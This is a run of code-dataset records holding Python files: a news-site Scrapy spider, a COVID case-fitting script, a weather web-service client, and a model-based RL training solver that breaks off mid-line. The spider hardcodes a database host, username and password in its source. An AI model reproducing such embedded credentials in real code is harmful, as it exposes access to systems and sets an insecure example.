out_f.write(str(gene) + \"\\tOVERALL\\t\" + str(rows[0][0]) + \"\\t\" + str(rows[0][1]) + \"\\n\")\n for row in rows[1][gene]:\n out_f.write(str(gene) + \"\\tWINDOW\\t\" + str(row[0]) + \"\\t\" + str(row[1]) + \"\\n\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Calculate dn/ds from ssearch36 outputs\")\n parser.add_argument(\"-o\",\"--output-prefix\", dest=\"output_prefix\", help=\"Output prefix\")\n parser.add_argument(\"input_fasta\", help=\"input fasta file\")\n args = parser.parse_args()\n input_fasta_file = args.input_fasta\n get_dn_ds_from_fasta(args.input_fasta, args.output_prefix)\n\nif __name__==\"__main__\":\n main()\n","sub_path":"scripts/process_fastas_to_dn_ds_followup2.py","file_name":"process_fastas_to_dn_ds_followup2.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"474514532","text":"from crawler.spiders import BaseSpider\n# 此文件包含的头文件不要修改\nimport scrapy\nfrom utils.util_old import *\nfrom crawler.items import *\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request, Response\nimport re\nimport time\nimport requests\nfrom datetime import datetime\nimport json\n\n#author 陈宣齐\nclass SinchewSpider(BaseSpider):\n name = 'sinchew'\n website_id = 13 # 网站的id(必填)\n language_id = 1813 # 所用语言的id\n allowed_domains = ['sinchew.com.my']\n start_urls = ['https://www.sinchew.com.my/']\n sql = { # sql配置\n 'host': '192.168.235.162',\n 'user': 'dg_admin',\n 'password': 'dg_admin',\n 'db': 'dg_crawler'\n }\n\n # 这是类初始化函数,用来传时间戳参数\n \n \n \n\n def parse(self, response, **kwargs):\n soup = BeautifulSoup(response.text, 'lxml')\n for i in soup.select('.dropdownlistbylist > a'):\n yield Request(url=i.get('href'),callback=self.parse_2,meta={'category1':i.text})\n\n def parse_2(self,response):\n page_soup = BeautifulSoup(response.text, 'lxml')\n img = ''\n abstract = ''\n last_time = ''\n if page_soup.find('div', id='articlenum',style='width:670px;text-align:left;float:left;margin-top:30px;') is not None:\n for i in page_soup.select('div #articlenum > li'):\n new_url = i.find('a').get('href')\n title = i.find('div', style='font-size:20px;').text\n abstract = i.find('div', style='font-size:15px;padding-top:5px;').text\n if i.find('img') is not None and i.find('img').get('src') != '/pagespeed_static/1.JiBnMqyl6S.gif':\n img = i.find('img').get('src')\n pub_time = i.find('div', id='time').text\n last_time = pub_time\n if self.time == None or Util.format_time3(pub_time) >= int(self.time):\n yield scrapy.Request(new_url.strip(),callback=self.parse_3,meta={'category1':response.meta['category1'],'title':title,'pub_time':pub_time,'abstract':abstract,'img':img})\n else:\n self.logger.info(\"时间截止\")\n if page_soup.find('li', class_='page-next') is not None:\n if self.time == None or Util.format_time3(last_time) >= int(self.time):\n yield Request(url=page_soup.find('li', class_='page-next').find('a').get('href').strip(),callback=self.parse_2,meta={'category1':response.meta['category1']})\n else:\n self.logger.info(\"时间截至\")\n\n\n def parse_3(self,response):\n new_soup = BeautifulSoup(response.text, 'lxml')\n item = NewsItem()\n item['pub_time'] = response.meta['pub_time']\n item['title'] = response.meta['title']\n item['images'] = [response.meta['img']]\n item['body'] = ''\n for i in new_soup.find('div', id='dirnum').find_all('p'):\n item['body'] += i.text\n if response.meta['abstract'] == '':\n item['abstract'] = item['body'].split('。')[0]\n else:\n item['abstract'] = response.meta['abstract']\n item['category1'] = response.meta['category1']\n item['category2'] = ''\n yield item\n","sub_path":"crawler/v1/sinchew.py","file_name":"sinchew.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"52547615","text":"###-----------###\n### Importing ###\n###-----------###\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\n\nfrom scipy.optimize import curve_fit\n\n###------------------###\n### Helper Functions ###\n###------------------###\n\n## Time series management\ndef national_timeseries(df, log=False):\n '''\n Returns a dataframe with the national number of COVID cases for Mexico where each row is indexed by a date (t0 = 2020-02-28).\n If log=True, return the log of the cases.\n '''\n if log:\n return np.log10( df.set_index('Fecha').loc[:,['México']] )\n else:\n return df.set_index('Fecha').loc[:,['México']]\n\n###-------###\n### Model ###\n###-------###\ndef exponential_model(t, y0, β): return y0 * np.exp(β*t)\n\n\nif __name__ == \"__main__\":\n\n # Reading data\n DATA_URL_MEX = 'https://raw.githubusercontent.com/mexicovid19/Mexico-datos/master/datos/series_de_tiempo/'\n mex_confirmed = pd.read_csv(DATA_URL_MEX+'covid19_mex_casos_totales.csv', )\n\n # paths for saving\n PLOT_PATH = '../media/'\n CSV_PATH = '../results/'\n save_ = True\n\n # Fit time window\n n_days = 10\n total_cases_timeseries = national_timeseries(mex_confirmed).iloc[-n_days:,0]\n\n # Data preparation\n xdata = np.array( range(len(total_cases_timeseries)) )\n ydata = total_cases_timeseries.values\n\n # Initial parameter guess\n p0 = [ydata[-1], 0.1]\n\n # Model parameter fit. Returns parameters and their covariance matrix\n popt, pcov = curve_fit(exponential_model, xdata, ydata, p0)\n\n # Projection days\n forecast_horizon = 2 # days\n\n # Growth rate std\n σ = np.sqrt( pcov[1,1] )\n\n # Fitting and projecting\n xfit = range( len(xdata) + forecast_horizon )\n yfit = exponential_model(xfit, *popt)\n yfit_min = exponential_model(xfit[-(forecast_horizon+1):], popt[0], popt[1] - 2*σ, )\n yfit_max = exponential_model(xfit[-(forecast_horizon+1):], popt[0], popt[1] + 2*σ, )\n\n # helper temporal values\n trange = total_cases_timeseries.index.values\n t0 = datetime.datetime.strptime( trange[0], '%Y-%m-%d')\n tfit = [(t0 + datetime.timedelta(days=t)).strftime('%Y-%m-%d') for t in xfit ]\n\n # Dataframe with fits and data\n Data = national_timeseries(mex_confirmed)\n Data['México'] = Data['México'].astype(int)\n CSV = Data.join(pd.Series( np.round(yfit), tfit, name='Fit'), how='outer' )\n CSV = CSV.join(pd.Series( np.round(yfit_min), tfit[-(forecast_horizon+1):], name='Fit_min'), how='outer' )\n CSV = CSV.join(pd.Series( np.round(yfit_max), tfit[-(forecast_horizon+1):], name='Fit_max'), how='outer' )\n\n # Plotting\n plt.figure( figsize=(10,8) )\n # plot data\n plt.plot(trange, ydata, lw=0, marker='o', ms=8)\n # plot fit\n plt.plot(tfit, yfit, c='orange')\n # error cones\n plt.fill_between(tfit[-(forecast_horizon+1):], yfit_min, yfit_max,\n alpha=0.2, color='orange');\n\n plt.title( 'Casos totales de COVID-19 en {}'.format( 'México' ) , size=16)\n plt.ylabel('Número de casos', size=15);\n plt.legend(loc='upper left')\n plt.xticks(rotation=45)\n # plt.yscale('log')\n plt.tight_layout()\n\n if save_:\n plt.savefig( PLOT_PATH+'covid19_mex_fit.png' )\n CSV.to_csv( CSV_PATH+'covid19_mex_fit.csv' )\n plt.show()\n else:\n print(CSV)\n plt.show()\n","sub_path":"src/run_exponential_fit.py","file_name":"run_exponential_fit.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"646776404","text":"#!/usr/bin/env python\r\n# encoding:utf-8\r\n# By eathings\r\n\r\nimport urllib\r\nimport urllib2\r\nimport re\r\nfrom xml.dom.minidom import parseString\r\n\r\n\r\nclass Weather:\r\n def __init__(self):\r\n self.url = \"http://www.webxml.com.cn/webservices/weatherwebservice.asmx/getWeatherbyCityName\"\r\n\r\n def get_weather(self, thecityname):\r\n url = self.url + \"?thecityname=\" + thecityname\r\n result = urllib2.urlopen(url).read()\r\n dom = parseString(result)\r\n strings = dom.getElementsByTagName(\"string\")\r\n temperature_of_today = self.getText(strings[5].childNodes)\r\n weather_of_today = self.getText(strings[6].childNodes)\r\n temperature_of_tomorrow = self.getText(strings[12].childNodes)\r\n weather_of_tomorrow = self.getText(strings[13].childNodes)\r\n weather_tips = self.getText(strings[11].childNodes)\r\n weatherStr = u\"今明两天的天气状况是:\\n %s %s; %s %s;\\n\" % \\\r\n (weather_of_today, temperature_of_today,\r\n weather_of_tomorrow, temperature_of_tomorrow)\r\n weatherTips = u\"友情提示:\\n%s\" % weather_tips\r\n print(weatherStr)\r\n print(weatherTips)\r\n\r\n\r\n def getText(self, nodelist):\r\n \"\"\"\r\n 获取所有的\r\n \"\"\"\r\n rc = \"\"\r\n for node in nodelist:\r\n if node.nodeType == node.TEXT_NODE:\r\n rc = rc + node.data\r\n return rc\r\n\r\n\r\nweath = Weather()\r\nprint(\"Input city name :\")\r\nthecityname = raw_input()\r\nprint('city name:%s' % thecityname)\r\nweath.get_weather(thecityname)\r\n","sub_path":"PiaoyimqGeneralPythonCode/python-test/weather-view.py","file_name":"weather-view.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"518584019","text":"import os\nimport sys\nimport numpy as np\nimport torch\nimport math\nimport random\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch import distributions as pyd\nfrom copy import deepcopy\nfrom time import time\n\nimport mbopg.utils as utils\nfrom mbopg.actor import SacDiagGaussianActor, DiagGaussianActor\nfrom mbopg.critic import DoubleQCritic\nfrom mbopg.replay import ReplayBuffer\nfrom mbopg.memory.per import LazyPrioritizedMultiStepMemory\nfrom mbopg.artificial_replay import ArtificialReplayBuffer\n\n\nclass Policy():\n\n def __init__(self, actor, action_range, noise_dim, device, std):\n self.actor = actor\n self.action_range = action_range\n self.noise_dim = noise_dim\n self.device = device\n self.std = std\n \n def act(self, obs, sample=False):\n obs = torch.FloatTensor(obs).to(self.device)\n obs = obs.unsqueeze(0)\n action = self.actor(obs)\n action = action * self.action_range[0:-self.noise_dim]\n if sample:\n #action = dist.sample()\n action += self.std * torch.randn_like(action)\n action = torch.clamp(action, -1, 1)\n #else:\n # action = dist.mean\n #action = action * self.action_range[0:-self.noise_dim]\n action = action[0]\n #action = action[0, 0:-self.noise_dim]\n return action.detach().cpu().numpy()\n \n def save(self, filepath):\n save_dict = {\n 'actor': self.actor,\n 'action_range': self.action_range,\n 'noise_dim': self.noise_dim,\n 'std': self.std\n }\n torch.save(save_dict, filepath)\n \n def load(self, filepath, cpu=False):\n if cpu:\n save_dict = torch.load(filepath, map_location='cpu')\n else:\n save_dict = torch.load(filepath)\n self.actor = save_dict['actor']\n self.action_range = save_dict['action_range']\n self.noise_dim = save_dict['noise_dim']\n self.std = save_dict['std']\n\n\nclass MBRL_solver(nn.Module):\n\n def __init__(self, obs_dim, action_dim, horizon, epochs, actor_iterations_per_epoch, actor_repeat_per_epoch,\n critic_min_iterations_per_epoch,\n critic_max_iterations_per_epoch, critic_loss_threshold,\n critic_batch_size,\n critic_warmup_epochs,\n surrogate_epochs,\n surrogate_batchsize,\n surrogate_target_update_frequency,\n action_range, z_range, noise_dim, nprocs, comm, device,\n actor_logstd_bounds=[-5, 5], actor_hidden_dim=64, actor_hidden_layers=3, critic_hidden_dim=64, \n critic_hidden_layers=3, tau=0.005, surrogate_tau=0.005,\n actor_lr=1e-4, critic_lr=1e-4, actor_betas=[0.9, 0.999], \n critic_betas=[0.9, 0.999], capacity=1e5,\n gamma=0.99, alpha=0.1):\n super().__init__()\n self.obs_dim = obs_dim\n self.action_dim = action_dim + noise_dim\n self.horizon = horizon\n self.epochs = epochs\n self.nprocs = nprocs\n self.comm = comm\n\n self.actor_logstd_bounds = actor_logstd_bounds\n self.actor_iterations_per_epoch = actor_iterations_per_epoch\n self.actor_repeat_per_epoch = actor_repeat_per_epoch\n self.critic_min_iterations_per_epoch = critic_min_iterations_per_epoch\n self.critic_max_iterations_per_epoch = critic_max_iterations_per_epoch\n self.critic_loss_threshold = critic_loss_threshold\n self.critic_warmup_epochs = critic_warmup_epochs\n self.actor_hidden_dim = actor_hidden_dim\n self.actor_hidden_layers = actor_hidden_layers\n self.critic_hidden_dim = critic_hidden_dim\n self.critic_hidden_layers = critic_hidden_layers\n self.tau = tau\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.actor_betas = actor_betas\n self.critic_betas = critic_betas\n self.capacity = capacity\n self.noise_dim = noise_dim\n\n self.surrogate_epochs = surrogate_epochs\n self.surrogate_batchsize = surrogate_batchsize\n self.surrogate_tau = surrogate_tau\n self.surrogate_target_update_frequency = surrogate_target_update_frequency\n\n self.gamma = gamma\n self.init_alpha = alpha\n\n self.critic_batch_size = critic_batch_size\n\n action_range = list(action_range) + list(z_range)\n\n if device == 'cuda':\n self.action_range = torch.cuda.FloatTensor(action_range)\n else:\n self.action_range = torch.FloatTensor(action_range)\n \n self.action_range.requires_grad = False\n\n self.device = device\n\n self.epsilon = 0.9\n\n self.surrogate_replay_buffer = ReplayBuffer(obs_shape=[self.obs_dim], action_shape=[self.action_dim - noise_dim], capacity=int(self.capacity), device=self.device)\n\n self.action_std = torch.tensor([0.4], device=device)\n self.noise_std = torch.tensor([0.2, 0.2, 0.2], device=device)\n self.total_std = torch.cat([self.action_std, self.noise_std], dim=-1)\n\n self.full_reset()\n \n def solve(self, network, dataset_states, verbose=True):\n self.reset()\n self._solve(network, dataset_states, verbose=verbose)\n #del self.replay_buffer\n #self.replay_buffer = None\n #torch.cuda.empty_cache()\n self.solve_surrogate(network)\n policy = self.surrogate_actor.state_dict()\n critic = self.surrogate_critic.state_dict()\n return policy, critic\n \n def make_policy(self, policy):\n actor = DiagGaussianActor(self.obs_dim, self.action_dim - self.noise_dim, self.actor_hidden_dim, self.actor_hidden_layers).to(self.device)\n actor.load_state_dict(policy)\n policy = Policy(actor, self.action_range, self.noise_dim, self.device, self.action_std)\n return policy\n \n def anneal_epsilon(self, initial_epsilon, final_epsilon, timestep, final_timestep):\n decay = (final_epsilon / initial_epsilon) ** (1.0 / final_timestep)\n return initial_epsilon * decay ** timestep\n\n @property\n def alpha(self):\n return self.log_alpha.exp()\n \n @property\n def surrogate_alpha(self):\n return self.surrogate_log_alpha.exp()\n\n def update_critic(self):\n obs, action, reward, next_obs, not_done, _ = self.replay_buffer.sample(self.critic_batch_size)\n\n dist = self.actor_target(next_obs)\n #dist = self.actor(next_obs)\n\n next_action = dist.sample()\n log_prob = dist.log_prob(next_action).sum(-1, keepdim=True)\n\n target_Q1, target_Q2 = self.critic_target(next_obs, next_action)\n target_V = torch.min(target_Q1, target_Q2)# - self.alpha.detach() * log_prob\n target_Q = reward + (not_done * self.gamma * target_V)\n target_Q = target_Q.detach()\n\n # get current Q estimates\n current_Q1, current_Q2 = self.critic(obs, action)\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n # Optimize the critic\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.critic.parameters(), 50.0)\n self.critic_optimizer.step()\n\n return critic_loss.detach()\n\n def update_alpha(self, total_log_probs):\n self.log_alpha_optimizer.zero_grad()\n total_log_probs = total_log_probs / (self.nprocs * self.horizon * self.actor_iterations_per_epoch)\n alpha_loss = (self.alpha * (-total_log_probs - self.target_entropy).detach()).mean()\n alpha_loss.backward()\n torch.nn.utils.clip_grad_norm_([self.log_alpha], 5.0)\n self.log_alpha_optimizer.step()\n\n def _solve_once(self, network, dataset_states, epsilon_greedy=False):\n total_log_probs = []\n initial_obs = []\n\n for _ in range(self.actor_iterations_per_epoch):\n init_obs = dataset_states[np.random.randint(0, len(dataset_states))]\n for _ in range(self.actor_repeat_per_epoch):\n initial_obs.append(init_obs)\n\n obs = torch.stack(initial_obs, dim=0)\n \n states = []\n actions = []\n log_probs = []\n rewards = []\n dones = []\n Ws = []\n \n for t in range(self.horizon):\n dist = self.actor(obs)\n action = dist.rsample()\n\n log_prob = dist.log_prob(action).sum(-1)\n out_action = action * self.action_range.unsqueeze(dim=0)\n\n act_action = out_action[:, 0:-self.noise_dim]\n\n z = out_action[:, -self.noise_dim:]\n\n w = network.sample(1, z)\n\n next_obs, reward, done = network.primarynet.batch_mbrl(obs, act_action, w)\n \n next_obs = next_obs[:, 0]\n reward = reward[:, 0, 0]\n done = done[:, 0, 0]\n \n \"\"\"\n self.replay_buffer.add(obs.detach(),\n action.detach(), \n reward.unsqueeze(dim=-1).detach(), \n next_obs.detach(), \n (done.unsqueeze(dim=-1) > 0.5).float().detach(),\n False)\n \"\"\"\n \n states.append(obs)\n actions.append(action)\n log_probs.append(log_prob)\n dones.append(done)\n rewards.append(reward)\n total_log_probs.append(log_prob)\n Ws.append(w)\n\n obs = next_obs\n\n if t + 1 == self.horizon:\n next_state = next_obs\n dist = self.actor(next_state)\n next_action = dist.rsample()\n next_log_prob = dist.log_prob(next_action).sum(-1)\n break\n\n states.append(next_state)\n actions.append(next_action)\n log_probs.append(next_log_prob)\n \n #Q1, Q2 = self.critic(states[-1], actions[-1])\n #V = torch.min(Q1, Q2)\n #V = V[:, 0] - self.alpha.detach() * log_probs[-1]\n V = 0\n\n for t in reversed(range(len(rewards))):\n V = rewards[t] - self.alpha.detach() * log_probs[t] + (1.0 - dones[t]) * self.gamma * V\n \n actor_values = []\n\n for aidx in range(self.actor_iterations_per_epoch):\n avg_V = 0\n for bidx in range(self.actor_repeat_per_epoch):\n avg_V += V[aidx * self.actor_repeat_per_epoch + bidx]\n avg_V = avg_V / self.actor_repeat_per_epoch\n actor_values.append(avg_V)\n \n return actor_values, total_log_probs\n\n def _solve(self, network, dataset_states, verbose=True):\n for epoch in range(self.epochs):\n self.epsilon = self.anneal_epsilon(0.9, 0.1, epoch, self.epochs + 1)\n\n #if epoch % 100 == 0:\n # self.fill_replay(network, dataset_states)\n\n package = {\n 'continue': True,\n 'collect_data': False,\n 'policy': self.actor.state_dict(),\n 'critic': self.critic.state_dict(),\n 'logalpha': self.log_alpha.data\n }\n\n for p in range(self.nprocs - 1):\n self.comm.send(package, dest=p+1)\n\n critic_losses = 0#100.0\n critic_itrs = 0\n\n #while critic_itrs < self.critic_min_iterations_per_epoch or (critic_losses >= self.critic_loss_threshold and critic_itrs < self.critic_max_iterations_per_epoch):\n # critic_losses = self.update_critic()\n # critic_itrs += 1\n\n #utils.soft_update_params(self.critic, self.critic_target, self.tau)\n #utils.soft_update_params(self.actor, self.actor_target, self.tau)\n\n actor_values, total_log_probs = self._solve_once(network, dataset_states)\n\n actor_values = torch.stack(actor_values, dim=0)\n actor_loss = -torch.mean(actor_values)\n\n total_log_probs = torch.stack(total_log_probs, dim=0)\n total_log_probs = torch.sum(total_log_probs)\n\n loss = actor_loss\n\n self.manual_set_zero_grads(network)\n\n loss.backward()\n\n all_actor_loss = [actor_loss]\n \n for p in range(self.nprocs - 1):\n grads = self.comm.recv()\n\n for name, w in self.actor.named_parameters():\n w.grad = w.grad + grads['policy_grads'][name]\n \n all_actor_loss.append(grads['actor_loss'])\n total_log_probs += grads['total_log_probs']\n\n self.add_transitions_to_replay(grads['transitions'])\n\n all_actor_loss = torch.stack(all_actor_loss, dim=0)\n\n for name, w in self.actor.named_parameters():\n w.grad = w.grad / self.nprocs\n \n torch.nn.utils.clip_grad_norm_(self.actor.parameters(), 5.0)\n\n self.actor_optimizer.step() \n\n #self.update_alpha(total_log_probs) \n\n if verbose:\n print(f\"Iteration {epoch} ; Actor value = {-torch.mean(all_actor_loss)} ; Critic loss = {critic_losses} ; Alpha = {self.alpha.detach()}\")\n sys.stdout.flush()\n\n package = {\n 'continue': False\n }\n for p in range(self.nprocs - 1):\n self.comm.send(package, dest=p+1)\n \n def manual_set_zero_grads(self, network):\n self.actor_optimizer.zero_grad()\n self.critic_optimizer.zero_grad()\n network.optim.zero_grad()\n\n def fill_replay(self, network, dataset_states):\n package = {\n 'continue': True,\n 'collect_data': True,\n 'epsilon': self.epsilon,\n 'policy': self.actor.state_dict(),\n 'critic': self.critic.state_dict()\n }\n\n for p in range(self.nprocs - 1):\n self.comm.send(package, dest=p+1)\n\n with torch.no_grad():\n for _ in range(self.critic_warmup_epochs):\n _, _, = self._solve_once(network, dataset_states, epsilon_greedy=True)\n \n for p in range(self.nprocs - 1):\n transitions = self.comm.recv()\n self.add_transitions_to_replay(transitions)\n \n def process_fill_replay(self, policy, critic, network, dataset_states):\n self.actor.load_state_dict(policy)\n self.critic.load_state_dict(critic)\n\n starting_idx = self.replay_buffer.idx\n \n with torch.no_grad():\n for _ in range(self.critic_warmup_epochs):\n _, _, = self._solve_once(network, dataset_states, epsilon_greedy=True)\n \n final_idx = self.replay_buffer.idx\n if starting_idx > final_idx:\n final_idx = self.replay_buffer.capacity\n \n transitions = {\n 'obses': self.replay_buffer.obses[starting_idx:final_idx],\n 'actions': self.replay_buffer.actions[starting_idx:final_idx],\n 'rewards': self.replay_buffer.rewards[starting_idx:final_idx],\n 'next_obses': self.replay_buffer.next_obses[starting_idx:final_idx],\n 'dones': 1.0 - self.replay_buffer.not_dones[starting_idx:final_idx]\n }\n \n return transitions\n\n def add_transitions_to_replay(self, transitions):\n obses = transitions['obses']\n actions = transitions['actions']\n rewards = transitions['rewards']\n next_obses = transitions['next_obses']\n dones = transitions['dones']\n self.replay_buffer.add(obses.detach(), actions.detach(), rewards.detach(), next_obses.detach(), dones.detach(), False)\n\n def collect_rollouts(self, policy, critic, network, dataset_states):\n self.actor.load_state_dict(policy)\n self.critic.load_state_dict(critic)\n\n starting_idx = self.replay_buffer.idx\n actor_values, total_log_probs = self._solve_once(network, dataset_states)\n final_idx = self.replay_buffer.idx\n if starting_idx > final_idx:\n final_idx = self.replay_buffer.capacity\n\n actor_values = torch.stack(actor_values, dim=0)\n actor_loss = -torch.mean(actor_values)\n\n loss = actor_loss\n\n self.manual_set_zero_grads(network)\n\n loss.backward()\n\n policy_grads = dict()\n \n for name, w in self.actor.named_parameters():\n policy_grads[name] = w.grad\n \n total_log_probs = torch.stack(total_log_probs, dim=0)\n total_log_probs = torch.sum(total_log_probs)\n\n transitions = {\n 'obses': self.replay_buffer.obses[starting_idx:final_idx],\n 'actions': self.replay_buffer.actions[starting_idx:final_idx],\n 'rewards': self.replay_buffer.rewards[starting_idx:final_idx],\n 'next_obses': self.replay_buffer.next_obses[starting_idx:final_idx],\n 'dones': 1.0 - self.replay_buffer.not_dones[starting_idx:final_idx]\n }\n\n return policy_grads, actor_loss, total_log_probs, transitions\n\n def solve_surrogate(self, network):\n #aug_replay_buffer = LazyPrioritizedMultiStepMemory(self.capacity, self.obs_dim, self.device, beta_steps=self.surrogate_epochs, multi_step=1)\n aug_replay_buffer = ReplayBuffer(obs_shape=[self.obs_dim], action_shape=[self.action_dim - self.noise_dim], capacity=int(self.capacity), device=self.device)\n\n for idx in range(len(self.surrogate_replay_buffer)):\n state = self.surrogate_replay_buffer.obses[idx]\n action = self.surrogate_replay_buffer.actions[idx]\n reward = self.surrogate_replay_buffer.rewards[idx]\n next_state = self.surrogate_replay_buffer.next_obses[idx]\n done = 1.0 - self.surrogate_replay_buffer.not_dones[idx]\n aug_replay_buffer.add(state, action, reward, next_state, done, False)\n\n max_reward = -1000000.0\n\n with torch.no_grad():\n for idx in range(0, len(self.surrogate_replay_buffer), self.surrogate_batchsize):\n initial_obs = []\n for j in range(self.surrogate_batchsize):\n init_obs = torch.from_numpy(self.surrogate_replay_buffer.obses[idx + j]).to(self.device)\n #init_obs = self.surrogate_replay_buffer.obses[idx + j].clone()\n for _ in range(self.actor_repeat_per_epoch):\n initial_obs.append(init_obs)\n obs = torch.stack(initial_obs, dim=0)\n\n for t in range(self.horizon):\n dist = self.actor(obs)\n action = dist.sample()\n\n log_prob = dist.log_prob(action).sum(-1)\n out_action = action * self.action_range.unsqueeze(dim=0)\n\n act_action = out_action[:, 0:-self.noise_dim]\n\n z = out_action[:, -self.noise_dim:]\n\n w = network.sample(1, z)\n\n next_obs, reward, done = network.primarynet.batch_mbrl(obs, act_action, w)\n\n max_reward = max(max_reward, float(torch.max(reward)))\n \n next_obs = next_obs[:, 0]\n reward = reward[:, 0, 0]\n done = done[:, 0, 0]\n\n for jdx in range(self.surrogate_batchsize * self.actor_repeat_per_epoch):\n aug_replay_buffer.add(obs[jdx].cpu(),\n action[jdx, 0:-self.noise_dim].cpu(), \n reward[jdx].cpu(), \n next_obs[jdx].cpu(), \n (done[jdx] > 0.5).float().cpu(),\n False\n )\n \n obs = next_obs\n\n print(f\"Maximum reward = {max_reward}\")\n\n target_noise = 0.1\n noise_clip = 0.2\n act_limit = 1.0\n\n for epoch in range(self.surrogate_epochs):\n obs, action, reward, next_obs, not_done, _ = aug_replay_buffer.sample(self.surrogate_batchsize)\n #batch, weights = aug_replay_buffer.sample(self.surrogate_batchsize)\n #obs, action, reward, next_obs, done = batch\n #not_done = 1.0 - done\n\n with torch.no_grad():\n pi_targ = self.surrogate_actor_target(next_obs)\n # Target policy smoothing\n epsilon = torch.randn_like(pi_targ) * target_noise\n epsilon = torch.clamp(epsilon, -noise_clip, noise_clip)\n next_action = pi_targ + epsilon\n next_action = torch.clamp(next_action, -act_limit, act_limit)\n \n target_Q1, target_Q2 = self.surrogate_critic_target(next_obs, next_action)\n target_V = torch.min(target_Q1, target_Q2)# - self.surrogate_alpha.detach() * log_prob\n target_Q = reward + (not_done * self.gamma * target_V)\n target_Q = target_Q.detach()\n\n # get current Q estimates\n current_Q1, current_Q2 = self.surrogate_critic(obs, action)\n #errors = 0.5 * (torch.abs(current_Q1.detach() - target_Q) + torch.abs(current_Q2.detach() - target_Q))\n errors = torch.abs(current_Q1.detach() - target_Q)\n #critic_loss = torch.mean((current_Q1 - target_Q).pow(2) * weights) + torch.mean((current_Q2 - target_Q).pow(2) * weights)\n critic_loss = torch.mean((current_Q1 - target_Q).pow(2)) + torch.mean((current_Q2 - target_Q).pow(2))\n \n # Optimize the critic\n self.surrogate_critic_optimizer.zero_grad()\n critic_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.surrogate_critic.parameters(), 5.0)\n self.surrogate_critic_optimizer.step()\n\n #aug_replay_buffer.update_priority(errors)\n\n if (epoch + 1) % self.surrogate_target_update_frequency == 0:\n utils.soft_update_params(self.surrogate_critic, self.surrogate_critic_target, self.surrogate_tau)\n utils.soft_update_params(self.surrogate_actor, self.surrogate_actor_target, self.surrogate_tau)\n\n obs, action, reward, next_obs, not_done, _ = aug_replay_buffer.sample(self.surrogate_batchsize)\n\n \"\"\"\n dist = self.surrogate_actor(obs)\n action = dist.rsample()\n log_prob = dist.log_prob(action).sum(-1, keepdim=True)\n actor_Q1, actor_Q2 = self.surrogate_critic(obs, action)\n\n actor_Q = torch.min(actor_Q1, actor_Q2)\n actor_loss = (- actor_Q * weights).mean()\n #actor_loss = (weights * (self.surrogate_alpha.detach() * log_prob - actor_Q)).mean()\n \"\"\"\n action = self.surrogate_actor(obs)\n actor_Q1, actor_Q2 = self.surrogate_critic(obs, action)\n #actor_loss = -(actor_Q1 * weights).mean()\n actor_loss = -(actor_Q1).mean()\n\n # optimize the actor\n self.surrogate_actor_optimizer.zero_grad()\n actor_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.surrogate_actor.parameters(), 5.0)\n self.surrogate_actor_optimizer.step()\n \n # Alpha\n #alpha_loss = (self.surrogate_alpha * (-log_prob - self.target_entropy).detach()).mean()\n\n #self.surrogate_log_alpha_optimizer.zero_grad()\n #alpha_loss.backward()\n #torch.nn.utils.clip_grad_norm_([self.surrogate_log_alpha], 5.0)\n #self.surrogate_log_alpha_optimizer.step()\n \n print(f\"Surrogate Iteration {epoch} ; Actor loss = {actor_loss} ; Critic loss = {critic_loss} ; Alpha = {self.surrogate_alpha.detach()}\")\n sys.stdout.flush()\n\n def full_reset(self):\n self.surrogate_actor = DiagGaussianActor(self.obs_dim, self.action_dim - self.noise_dim, self.actor_hidden_dim, self.actor_hidden_layers).to(self.device)\n self.surrogate_actor_target = DiagGaussianActor(self.obs_dim, self.action_dim - self.noise_dim, self.actor_hidden_dim, self.actor_hidden_layers).to(self.device)\n self.surrogate_actor_target.load_state_dict(self.surrogate_actor.state_dict())\n self.surrogate_actor_target.requires_grad = False\n self.surrogate_actor_optimizer = torch.optim.Adam(self.surrogate_actor.parameters(), lr=1e-3, betas=self.actor_betas)\n\n self.surrogate_critic = DoubleQCritic(self.obs_dim, self.action_dim - self.noise_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.surrogate_critic_target = DoubleQCritic(self.obs_dim, self.action_dim - self.noise_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.surrogate_critic_target.load_state_dict(self.surrogate_critic.state_dict())\n self.surrogate_critic_target.requires_grad = False\n self.surrogate_critic_optimizer = torch.optim.Adam(self.surrogate_critic.parameters(), lr=1e-3, betas=self.critic_betas)\n\n self.surrogate_log_alpha = torch.tensor(np.log(self.init_alpha)).to(self.device)\n self.surrogate_log_alpha.requires_grad = True\n self.surrogate_log_alpha_optimizer = torch.optim.Adam([self.surrogate_log_alpha], lr=1e-4, betas=[0.9, 0.999])\n\n self.actor = SacDiagGaussianActor(self.obs_dim, self.action_dim, self.actor_hidden_dim, self.actor_hidden_layers, self.actor_logstd_bounds).to(self.device)\n self.actor_target = SacDiagGaussianActor(self.obs_dim, self.action_dim, self.actor_hidden_dim, self.actor_hidden_layers, self.actor_logstd_bounds).to(self.device)\n self.actor_target.load_state_dict(self.actor.state_dict())\n self.actor_target.requires_grad = False\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=self.actor_lr, betas=self.actor_betas)\n\n self.critic = DoubleQCritic(self.obs_dim, self.action_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.critic_target = DoubleQCritic(self.obs_dim, self.action_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.critic_target.load_state_dict(self.critic.state_dict())\n self.critic_target.requires_grad = False\n self.critic_optimizer = 